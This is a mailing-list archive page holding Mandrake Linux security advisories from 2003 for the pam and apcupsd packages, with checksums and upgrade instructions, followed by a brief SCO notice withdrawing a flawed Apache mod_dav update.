-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: pam Advisory ID:MDKSA-2003:017 Date: February 18th, 2003 Affected versions: 8.1, 8.2, 9.0, Multi Network Firewall 8.2 Problem Description: Andreas Beck discovered that the pam_xauth module would forward authorization information from the root account to unprivileged users. This can be exploited by a local attacker to gain access to the root user's X session. In order for it to be successfully exploited, the attacker would have to somehow get the root user to su to the account belonging to the attacker. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1160 Updated Packages: Mandrake Linux 8.1: 012c289119d2c3e1f13e086eb46603b0 8.1/RPMS/pam-0.75-25.1mdk.i586.rpm f39c461c65b06233e97bfc86a3c847f4 8.1/RPMS/pam-devel-0.75-25.1mdk.i586.rpm d461c8185df78f0dfc6035ae195500b8 8.1/RPMS/pam-doc-0.75-25.1mdk.i586.rpm 376bd2062e8fb2128008bc6075bae8d1 8.1/RPMS/pam_ldap-156-1.1mdk.i586.rpm a1afc044aef022370275316123e9cbc5 8.1/SRPMS/pam-0.75-25.1mdk.src.rpm Mandrake Linux 8.1/IA64: e5fde05f5d39182a6b253ba9ead66043 ia64/8.1/RPMS/pam-0.75-25.1mdk.ia64.rpm eae2fdd91901a61cd8d22dddf35f03c2 ia64/8.1/RPMS/pam-devel-0.75-25.1mdk.ia64.rpm 1f842b6909b7c31c003b62e4b4997706 ia64/8.1/RPMS/pam-doc-0.75-25.1mdk.ia64.rpm f22145546bff2930131da1b2503692ce ia64/8.1/RPMS/pam_ldap-156-1.1mdk.ia64.rpm a1afc044aef022370275316123e9cbc5 ia64/8.1/SRPMS/pam-0.75-25.1mdk.src.rpm Mandrake Linux 8.2: 6f9d110a83450b1358384ea19e23a812 8.2/RPMS/pam-0.75-25.1mdk.i586.rpm ef33ba24e3fc431a89b0fba7031d55b8 8.2/RPMS/pam-devel-0.75-25.1mdk.i586.rpm 00fb03da32fcdef0b0a27ae1fb88307d 8.2/RPMS/pam-doc-0.75-25.1mdk.i586.rpm 16b952b71669460c7c4b9441b37e2014 8.2/RPMS/pam_ldap-156-1.1mdk.i586.rpm a1afc044aef022370275316123e9cbc5 8.2/SRPMS/pam-0.75-25.1mdk.src.rpm Mandrake Linux 8.2/PPC: 272b33cad29ea3ddecd03a56bab0b727 ppc/8.2/RPMS/pam-0.75-25.1mdk.ppc.rpm 8861331f5d5218ac5116813cc03abad0 ppc/8.2/RPMS/pam-devel-0.75-25.1mdk.ppc.rpm 08d5a458fab9e006344d87d7fe67168d ppc/8.2/RPMS/pam-doc-0.75-25.1mdk.ppc.rpm 0b73c3aba3ab7bdd2548a69934fa79f0 ppc/8.2/RPMS/pam_ldap-156-1.1mdk.ppc.rpm a1afc044aef022370275316123e9cbc5 ppc/8.2/SRPMS/pam-0.75-25.1mdk.src.rpm Mandrake Linux 9.0: dc82d88d63dafc3668e7ab4f1d09d404 9.0/RPMS/pam-0.75-25.1mdk.i586.rpm ca86fc0f07855ced3f9ed7793608d376 9.0/RPMS/pam-devel-0.75-25.1mdk.i586.rpm 65545ca4597990fb5ccf0218a2b6c922 9.0/RPMS/pam-doc-0.75-25.1mdk.i586.rpm b70c25f7b8a3b5f86149dd199003a4ff 9.0/RPMS/pam_ldap-156-1.1mdk.i586.rpm a1afc044aef022370275316123e9cbc5 9.0/SRPMS/pam-0.75-25.1mdk.src.rpm Multi Network Firewall 8.2: 6f9d110a83450b1358384ea19e23a812 mnf8.2/RPMS/pam-0.75-25.1mdk.i586.rpm a1afc044aef022370275316123e9cbc5 mnf8.2/SRPMS/pam-0.75-25.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsi
MDKSA-2003:018 - Updated apcupsd packages fix buffer overflow and remove vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: apcupsd Advisory ID:MDKSA-2003:018 Date: February 18th, 2003 Affected versions: 8.1, 8.2, 9.0 Problem Description: A remote root vulnerability in slave setups and some buffer overflows in the network information server code were discovered by the apcupsd developers. They have been fixed in the latest unstable version, 3.10.5 which contains additional enhancements like USB support, and the latest stable version, 3.8.6. There are a few changes that need to be noted, such as the port has changed from port 7000 to post 3551 for NIS, and the new config only allows access from the localhost. Users may need to modify their configuration files appropriately, depending upon their configuration. References: Updated Packages: Mandrake Linux 8.1: fe8b89884f11d6ee419e791e7c7ff76e 8.1/RPMS/apcupsd-3.10.5-1.1mdk.i586.rpm cf73f9b746b808c17d55dacb44a2efaa 8.1/SRPMS/apcupsd-3.10.5-1.1mdk.src.rpm Mandrake Linux 8.1/IA64: bc0b1ae0605ce9476dfa5777666e3694 ia64/8.1/RPMS/apcupsd-3.8.6-1.1mdk.ia64.rpm a935645bad43e00c7a71445b6781a5b4 ia64/8.1/SRPMS/apcupsd-3.8.6-1.1mdk.src.rpm Mandrake Linux 8.2: d18b5d3fdca353d465e9efc823a10728 8.2/RPMS/apcupsd-3.10.5-1.1mdk.i586.rpm cf73f9b746b808c17d55dacb44a2efaa 8.2/SRPMS/apcupsd-3.10.5-1.1mdk.src.rpm Mandrake Linux 8.2/PPC: 340b9871a68a4d7347633a1c61fa8d1e ppc/8.2/RPMS/apcupsd-3.10.5-1.1mdk.ppc.rpm cf73f9b746b808c17d55dacb44a2efaa ppc/8.2/SRPMS/apcupsd-3.10.5-1.1mdk.src.rpm Mandrake Linux 9.0: 9031edab8f3e692b6c5dbc8717819d8b 9.0/RPMS/apcupsd-3.10.5-1.1mdk.i586.rpm cf73f9b746b808c17d55dacb44a2efaa 9.0/SRPMS/apcupsd-3.10.5-1.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from: http://www.mandrakesecure.net/en/ftp.php Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command: rpm --checksig All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from: https://www.mandrakesecure.net/RPM-GPG-KEYS Please be aware that sometimes it takes the mirrors a few hours to update. You can view other update advisories for Mandrake Linux at: http://www.mandrakesecure.net/en/advisories/ MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting: http://www.mandrakesecure.net/en/mlist.php If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team - -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.7 (GNU/Linux) mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7 WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg 2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD LLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu ZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t PohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy /NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA BgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP WdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w Pk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA BgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H 8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K +jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy YWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j b20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCR
CSSA-2003-007.0 Advisory withdrawn. Re: Security Update: [CSSA-2003-007.0] Linux: Apache mod_dav module format string vulnerability
To: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] This update contained a vulnerable version of the mod_dav module. The update has been withdrawn, and is no longer available. SCO Security msg10828/pgp0.pgp Description: PGP signature
